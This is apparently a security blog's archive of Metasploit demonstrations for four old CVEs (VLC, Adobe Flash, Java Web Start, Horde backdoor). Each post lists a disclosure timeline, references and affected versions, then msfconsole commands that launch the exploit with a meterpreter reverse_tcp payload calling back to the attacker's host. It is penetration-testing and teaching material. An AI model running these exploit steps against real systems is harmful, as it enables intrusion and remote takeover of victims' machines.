Category Archives: Metasploit

All my posts regarding Metasploit framework, auxiliaries, plugins and exploits.

CVE-2008-5036 VLC Media Player RealText Subtitle Overflow Metasploit Demo

Exploits, Metasploit,

Timeline :

Vulnerability found by Tobias Klein
Vulnerability reported to the vendor by Tobias Klein the 2008-11-03
Coordinated public release of the vulnerability the 2008-11-05
Metasploit PoC provided the 2012-03-01

PoC provided by :

Tobias Klein
SkD
juan vazquez

Reference(s) :

CVE-2008-5036
OSVDB-49809
VideoLAN-SA-0810
TKADV2008-011

Affected version(s) :

VLC media player 0.9.5 down to 0.5.0

Tested on Windows XP Pro SP3 with :

VLC 0.9.4

Description :

This module exploits a stack buffer overflow vulnerability in VideoLAN VLC before 0.9.6. The vulnerability exists in the parsing of RealText subtitle files. In order to exploit this, this module will generate two files: The .mp4 file is used to trick your victim into running. The .rt file is the actual malicious file that triggers the vulnerability, which should be placed under the same directory as the .mp4 file.

Commands :

use exploit/windows/fileformat/vlc_realtext
SET PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit

use exploit/multi/handler
SET PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit -j

sysinfo
getuid

CVE-2012-0754 Adobe Flash Player MP4 Overflow Metasploit Demo

Exploits, Metasploit,

Timeline :

Vulnerability found by Alexander Gavrun from ZDI
Vulnerability reported to the vendor by ZDI the 2012-01-12
Coordinated public release of the vulnerability the 2012-02-15
Vulnerability found exploited in the wild by contagio the 2012-03-02
Metasploit PoC provided the 2012-03-07

PoC provided by :

Alexander Gavrun
sinn3r
juan vazquez

Reference(s) :

CVE-2012-0754
OSVDB-79300
APSB12-03
ZDI-12-080
contagio

Affected version(s) :

Adobe Flash Player 11.1.102.55 and earlier versions for Windows, Macintosh, Linux and Solaris operating systems
Adobe Flash Player 11.1.112.61 and earlier versions for Android 4.x, and Adobe Flash Player 11.1.111.5 and earlier versions for Android 3.x and 2.x

Tested on Windows XP Pro SP3 with :

Adobe Flash Player 11.1.102.55
Internet Explorer 8

Description :

This module exploits a vulnerability found in Adobe Flash Player. By supplying a corrupt .mp4 file loaded by Flash, it is possible to gain arbitrary remote code execution under the context of the user. This vulnerability has been exploited in the wild as part of the “Iran’s Oil and Nuclear Situation.doc” e-mail attack.

Commands :

use exploit/windows/browser/adobe_flash_mp4_cprt
set SRVHOST 192.168.178.100
SET PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit

sysinfo
getuid

CVE-2012-0500 Oracle Java Web Start Plugin Command Line Argument Injection Metasploit Demo

Exploits, Metasploit, , , ,

Timeline :

Vulnerability “ZDI-12-037” reported by Chris Ries to ZDI
Vulnerability reported to the vendor by ZDI the 2011-10-28 for “ZDI-12-037”
Coordinated public release of the vulnerability the 2012-02-22
Metasploit PoC provided the 2012-02-23

PoC provided by :

jduck

Reference(s) :

CVE-2012-0500
OSVDB-79227
ZDI-12-037
TSL20120214-01
Oracle Java SE Critical Patch Update Advisory – February 2012

Affected version(s) :

Oracle Java Development Kit (JDK) 6 Update 30 and prior
Oracle Java Development Kit (JDK) 7 Update 2 and prior
Oracle JavaFX 2.0.2 and prior
Oracle Java Runtime Environment (JRE) 6 Update 30 and prior
Oracle Java Runtime Environment (JRE) 7 Update 2 and prior

Tested on Windows XP Pro SP3 with :

Java 6 Update 30
Internet Explorer 8

Description :

This module exploits a flaw in the Web Start component of the Sun Java Runtime Environment. The arguments passed to Java Web Start are not properly validated, allowing injection of arbitrary arguments to the JVM. By utilizing the lesser known -J option, an attacker can take advantage of the -XXaltjvm option, as discussed previously by Ruben Santamarta. This method allows an attacker to execute arbitrary code in the context of an unsuspecting browser user. In order for this module to work, it must be ran as root on a server that does not serve SMB. Additionally, the target host must have the WebClient service (WebDAV Mini-Redirector) enabled.

Commands :

use exploit/windows/browser/java_ws_vmargs
set SRVHOST 192.168.178.100
SET PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit

sysinfo
getuid

CVE-2012-0209 Horde 3.3.12 Backdoor Metasploit Demo

Exploits, Metasploit,

Timeline :

Public release of the vulnerability the 2012-02-13
Details of the vulnerability and first PoC disclosed by Eric Romang the 2012-02-15
Metasploit PoC provided the jduck 2012-02-16

PoC provided by :

Eric Romang
jduck

Reference(s) :

CVE-2012-0209

Affected version(s) :

Horde 3.3.12 downloaded between November 15 and February 7
Horde Groupware 1.2.10 downloaded between November 9 and February 7
Horde Groupware Webmail Edition 1.2.10 downloaded between November 2 and February 7

Tested on Ubuntu 11.10 with :

Horde 3.3.12

Description :

This module exploits an arbitrary PHP code execution vulnerability introduced as a backdoor into Horde 3.3.12 and Horde Groupware 1.2.10.

Commands :

use exploit/multi/http/horde_href_backdoor
set VHOST devnull.zataz.loc
set RHOST 192.168.178.100
set PAYLOAD cmd/unix/generic 
set CMD uname -a
exploit